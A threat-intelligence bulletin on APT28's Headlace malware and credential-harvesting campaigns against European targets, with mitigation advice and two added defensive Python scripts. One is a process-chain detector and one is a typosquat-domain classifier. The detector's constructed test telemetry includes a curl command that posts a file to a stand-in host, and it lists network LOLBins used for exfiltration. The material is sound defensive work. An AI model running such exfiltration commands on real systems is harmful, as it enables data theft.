APT28 Targets Key Networks in Europe With Headlace Malware

Summary:
On September 4, 2023, CERT-UA reported a phishing campaign that leveraged Headlace malware to target a critical energy infrastructure facility in Ukraine. In that campaign, BlueDelta sent phishing emails from a spoofed sender address containing links to archive files. The archives held lure images and a Windows BAT script which, if executed, ran the whoami command and exfiltrated its output to the threat actor. Over the past year, Insikt Group has tracked the evolution of BlueDelta’s (APT28) operational infrastructure, which was used to deploy its information-stealing malware Headlace in three distinct phases between April and December 2023. The activity resembles activity previously attributed to APT28 (Fancy Bear), which is assessed to operate as part of Russia’s GRU, and it is consistent with Russia devoting substantial resources to gaining a strategic advantage over Ukraine. Throughout these attacks, BlueDelta used phishing emails, legitimate internet services (LIS), and living-off-the-land binaries (LOLBins) to extract intelligence from key networks across Europe. The group ran credential harvesting campaigns against Yahoo and UKR[.]net users, as well as against specific victims’ mail servers. BlueDelta’s tactics, which rely primarily on credential capture for initial access, are engineered to blend in with regular network traffic, making detection difficult. Some of BlueDelta’s credential harvesting pages can bypass two-factor authentication by relaying requests between the legitimate service and compromised Ubiquiti routers, which increases their effectiveness. The abuse of LIS such as GitHub to host redirection scripts further complicates the identification of malicious activity. Critical sectors targeted by BlueDelta, including government, military, defense, energy, transportation, and think tanks, must bolster their awareness and defenses against these tactics.
Security awareness training should prioritize the identifying characteristics of BlueDelta’s phishing emails, which are highlighted in Insikt Group reporting.
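As an added detection example (not code from the Insikt Group or CERT-UA reporting), the Python below runs the logic a SOC would want over the chain described above: a BAT script launched through cmd.exe whose children include whoami followed shortly by a network-capable LOLBin from the same parent. The event records are constructed to resemble Sysmon Event ID 1 (process creation) data; the field names, the LOLBin list and the 60-second window are assumptions for the example, not indicators from the report.

```python
"""Flag the BAT -> whoami -> network LOLBin chain in process-creation telemetry.

Added example, not from the Insikt Group / CERT-UA reporting. The records below
are constructed to resemble Sysmon Event ID 1; the field names are an assumption.
"""
from datetime import datetime, timedelta

# Constructed sample telemetry. WS01 reproduces the chain described in the
# summary; WS02 is a benign interactive `whoami` with no follow-on network tool.
EVENTS = [
    {"ts": "2023-09-04T10:00:00", "host": "WS01", "pid": 4000, "ppid": 3000,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\user\Downloads\lure\war.bat"'},
    {"ts": "2023-09-04T10:00:01", "host": "WS01", "pid": 4001, "ppid": 4000,
     "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
    {"ts": "2023-09-04T10:00:02", "host": "WS01", "pid": 4002, "ppid": 4000,
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -s -d @out.txt https://example.invalid/up"},
    {"ts": "2023-09-04T11:00:00", "host": "WS02", "pid": 5000, "ppid": 2000,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"ts": "2023-09-04T11:00:05", "host": "WS02", "pid": 5001, "ppid": 5000,
     "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /all"},
]

# Binaries commonly used to move data off a host. Assumed list; extend to taste.
NETWORK_LOLBINS = {"curl.exe", "certutil.exe", "bitsadmin.exe",
                   "powershell.exe", "mshta.exe", "msiexec.exe"}
WINDOW = timedelta(seconds=60)   # assumption: exfil follows whoami within a minute


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one alert per cmd.exe-launched .bat whose children include whoami
    followed (within WINDOW) by a network-capable LOLBin."""
    by_parent = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_parent.setdefault((e["host"], e["ppid"]), []).append(e)

    alerts = []
    for parent in events:
        if basename(parent["image"]) != "cmd.exe":
            continue
        if ".bat" not in parent["cmdline"].lower():
            continue
        kids = by_parent.get((parent["host"], parent["pid"]), [])
        whoami = [k for k in kids if basename(k["image"]) == "whoami.exe"]
        if not whoami:
            continue
        t0 = datetime.fromisoformat(whoami[0]["ts"])
        for k in kids:
            dt = datetime.fromisoformat(k["ts"]) - t0
            if basename(k["image"]) in NETWORK_LOLBINS and timedelta(0) <= dt <= WINDOW:
                alerts.append({
                    "host": parent["host"],
                    "script": parent["cmdline"],
                    "recon": whoami[0]["cmdline"],
                    "exfil": k["cmdline"],
                    "seconds_after_whoami": dt.total_seconds(),
                })
                break   # one alert per script launch is enough
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[{a['host']}] {a['script']} -> {a['recon']} -> {a['exfil']} "
              f"(+{a['seconds_after_whoami']:.0f}s)")
```

The parent-child join is what keeps this from firing on every administrator who types whoami: the BAT launch, the recon and the network tool must share a parent on the same host and sit inside the window. In a real SIEM the same three conditions map onto a correlation rule over process-creation events rather than an in-memory dictionary.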

Security Officer Comments:
BlueDelta’s espionage activity reflects a broader strategy of gathering intelligence on entities with military significance to Russia in the context of its ongoing aggression against Ukraine. This focus is consistent with the objective of uncovering operational capabilities and potential vulnerabilities within Ukraine’s defense sector. Across these campaigns, BlueDelta has continuously refined its operations, demonstrating notable sophistication and adaptability. Russia’s strategic interests include targeting Ukrainian military organizations, gathering information to support its war in Ukraine, and monitoring the geopolitical landscape of NATO and Russia’s neighboring countries. Notably, in September 2023 Zscaler published a report with additional information on BlueDelta’s new attack chains, which targeted organizations in Australia, Belgium, and Poland. In December 2023, Proofpoint and IBM published research on a new wave of BlueDelta spearphishing that used a variety of lure content to deliver Headlace malware.

Suggested Corrections:
Recorded Future has published relevant IOCs and MITRE ATT&CK techniques in their report.

Recorded Future makes the following mitigation recommendations:

  • Establish real-time alerts to detect typosquat domains that mimic your brand. This proactive measure helps guard against actors like BlueDelta, which could exploit such domains for credential harvesting and phishing.
  • Implement multi-factor authentication (MFA) to add an extra layer of security and make it more challenging for attackers to abuse compromised credentials. Because BlueDelta’s harvesting pages relay requests through to the legitimate service, one-time codes and push approvals can be captured and used in real time; phishing-resistant factors such as FIDO2/WebAuthn security keys or passkeys are bound to the genuine origin and are not captured this way.
  • Monitor open source reporting for the latest threat actor tradecraft, TTPs, targeting, and indicators of compromise (IoCs) to ensure you are informed of the threat.
  • Provide comprehensive training to employees on email security best practices, including identifying phishing emails, suspicious attachments, and links. Regularly reinforce training to maintain a high level of awareness and vigilance.
  • Implement a domain name system (DNS) blocking policy to prevent connections to free hosting apex domains, such as those used by InfinityFree and free API services, if your company does not use them.
  • Be cautious of suspicious-looking email attachments and report them to the organization’s internal IT team.
  • Restrict access to the non-essential free services that BlueDelta frequently abuses, as highlighted in the report.
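The first and fifth recommendations above call for alerting on typosquat domains and for blocking free-hosting apex domains. As an added example (not Recorded Future’s tooling), the Python below classifies candidate hostnames, such as those pulled from a certificate-transparency or newly-registered-domain feed, against a protected brand and an apex blocklist. The brand, the candidate names, the homoglyph table and the blocklist are constructed for the example; public-suffix handling is deliberately naive (the last label is treated as the TLD), which a production version should replace with a public suffix list.

```python
"""Classify candidate hostnames as typosquats of a brand or as free-hosting
apex domains to block. Added example; every name below is constructed."""

BRAND = "example"                 # protected second-level label (assumption)
OWNED_TLDS = {"com"}              # TLDs the organisation actually registered
# Apex domains of free hosting/API services the organisation does not use.
# Constructed placeholders; populate from the report's IOCs and your own review.
BLOCKED_APEX = {"free-host.example", "free-api.example"}

# One-character look-alikes attackers substitute (assumed, not exhaustive).
HOMOGLYPHS = {"l": "1", "i": "1", "o": "0", "e": "3", "a": "4", "s": "5",
              "m": "rn", "w": "vv"}


def split_host(fqdn):
    """Return (second-level label, tld) using a naive single-label TLD rule.
    Assumption: no multi-part public suffixes such as co.uk."""
    labels = fqdn.lower().strip(".").split(".")
    if len(labels) < 2:
        return labels[0], ""
    return labels[-2], labels[-1]


def variants(brand):
    """Map typosquat kind -> set of look-alike labels generated from brand."""
    out = {"omission": set(), "transposition": set(),
           "repetition": set(), "homoglyph": set()}
    for i in range(len(brand)):
        out["omission"].add(brand[:i] + brand[i + 1:])
        out["repetition"].add(brand[:i] + brand[i] + brand[i:])
        if i + 1 < len(brand) and brand[i] != brand[i + 1]:
            out["transposition"].add(brand[:i] + brand[i + 1] + brand[i] + brand[i + 2:])
        sub = HOMOGLYPHS.get(brand[i])
        if sub:
            out["homoglyph"].add(brand[:i] + sub + brand[i + 1:])
    return out


def levenshtein(a, b):
    """Edit distance; a catch-all for variants the generators above miss."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(fqdn, brand=BRAND, owned_tlds=OWNED_TLDS, blocked_apex=BLOCKED_APEX):
    """Return a reason string if fqdn deserves an alert or block, else None."""
    sld, tld = split_host(fqdn)
    if f"{sld}.{tld}" in blocked_apex:
        return "free-hosting-apex"
    if sld == brand:
        return None if tld in owned_tlds else "tld-swap"
    if brand in sld:
        return "combosquat"        # brand plus extra words, e.g. example-login
    gen = variants(brand)
    for kind in ("transposition", "homoglyph", "omission", "repetition"):
        if sld in gen[kind]:
            return kind
    # Short brands produce too many false positives at distance 2; keep it tight.
    if levenshtein(sld, brand) <= (1 if len(brand) < 8 else 2):
        return "near-miss"
    return None


if __name__ == "__main__":
    # Constructed candidates, as a CT-log or new-domain feed might deliver them.
    for name in ("examp1e.com", "exmaple.com", "example.net", "login.example.com",
                 "example-login.com", "app.free-host.example", "unrelated.org"):
        print(f"{name:25} -> {classify(name)}")
```

The generated-variant checks give a named reason that is useful in the alert itself (a homoglyph registration is a stronger signal than a generic near-miss), and the edit-distance fallback catches the long tail. The apex check runs first because a free-hosting subdomain is blocked regardless of what label it carries.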

Link(s):
https://securityaffairs.com/164061/apt/apt28-headlace-malware-europe.html

https://www.recordedfuture.com/grus...rks-in-europe-with-multi-phase-espionage-camp

PDF Full Report: https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf